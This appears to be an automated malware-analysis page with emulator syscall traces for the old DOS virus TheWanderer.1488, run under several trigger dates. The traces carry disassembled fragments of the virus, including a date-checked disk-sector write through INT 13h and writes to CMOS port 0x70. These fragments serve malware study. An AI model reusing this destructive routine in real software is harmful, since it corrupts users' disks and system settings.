Sample viewer

vx.netlux.org/Virus.DOS.TheWanderer.1488

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:44:04.445610737Z 240 PC: 12dcd | UNKNOWN!
2018-12-17T22:44:04.446725651Z 255 PC: 12e3d | UNKNOWN!
2018-12-17T22:44:04.448569855Z 74 PC: 12ed0 | Reallocate memory
2018-12-17T22:44:04.450300245Z 75 PC: 12f36 | Execute program
2018-12-17T22:44:04.466970384Z 76 PC: 13235 | Terminate with return code (Return code = '0')
2018-12-17T22:44:04.4710093Z 73 PC: 12f3c | Release memory
2018-12-17T22:44:04.472739469Z 77 PC: 12f40 | Get program return code
2018-12-17T22:44:04.474359893Z 42 PC: 12f44 | Get date 0x12f44: cmp al, 0
0x12f46: jne 0x12f51
0x12f48: mov ah, 0x2c
0x12f4a: int 0x21
0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
2018-12-17T22:44:04.477489772Z 49 PC: 12aa4 | Terminate and stay resident (Return code = '1' | Memory size = '117')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8094,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:20.617033379Z 240 PC: 12dcd | UNKNOWN!
2018-12-25T12:03:20.61916073Z 255 PC: 12e3d | UNKNOWN!
2018-12-25T12:03:20.620938613Z 74 PC: 12ed0 | Reallocate memory
2018-12-25T12:03:20.622766302Z 75 PC: 12f36 | Execute program
2018-12-25T12:03:20.639526284Z 76 PC: 13235 | Terminate with return code (Return code = '0')
2018-12-25T12:03:20.642678133Z 73 PC: 12f3c | Release memory
2018-12-25T12:03:20.644072433Z 77 PC: 12f40 | Get program return code
2018-12-25T12:03:20.646567428Z 42 PC: 12f44 | Get date 0x12f44: cmp al, 0
0x12f46: jne 0x12f51
0x12f48: mov ah, 0x2c
0x12f4a: int 0x21
0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
2018-12-25T12:03:20.648676826Z 49 PC: 12aa4 | Terminate and stay resident (Return code = '2' | Memory size = '117')

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8094,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:20.978913061Z 240 PC: 12dcd | UNKNOWN!
2018-12-25T12:03:20.980807851Z 255 PC: 12e3d | UNKNOWN!
2018-12-25T12:03:20.98225399Z 74 PC: 12ed0 | Reallocate memory
2018-12-25T12:03:20.984061276Z 75 PC: 12f36 | Execute program
2018-12-25T12:03:21.003939035Z 76 PC: 13235 | Terminate with return code (Return code = '0')
2018-12-25T12:03:21.007315602Z 73 PC: 12f3c | Release memory
2018-12-25T12:03:21.008698033Z 77 PC: 12f40 | Get program return code
2018-12-25T12:03:21.009873532Z 42 PC: 12f44 | Get date 0x12f44: cmp al, 0
0x12f46: jne 0x12f51
0x12f48: mov ah, 0x2c
0x12f4a: int 0x21
0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
2018-12-25T12:03:21.0147422Z 44 PC: 12f4c | Get time 0x12f4c: cmp cl, 0x2c
0x12f4f: je 0x12f59
0x12f51: mov ah, 0x31
0x12f53: mov dx, 0x75
0x12f56: call 0x22a9e
0x12f59: mov ah, 0x19
0x12f5b: int 0x21
0x12f5d: mov dl, al
0x12f5f: cmp dl, 2
0x12f62: jb 0x12f66
0x12f64: add al, 0x7e
0x12f66: mov ax, 0x309
0x12f69: mov bx, 0x617
0x12f6c: mov cx, 1
0x12f6f: mov dh, 0
0x12f71: int 0x13
0x12f73: mov cx, 0x40
0x12f76: mov al, cl
0x12f78: out 0x70, al
0x12f7a: mov al, 0xff
2018-12-25T12:03:21.017203367Z 49 PC: 12aa4 | Terminate and stay resident (Return code = '0' | Memory size = '117')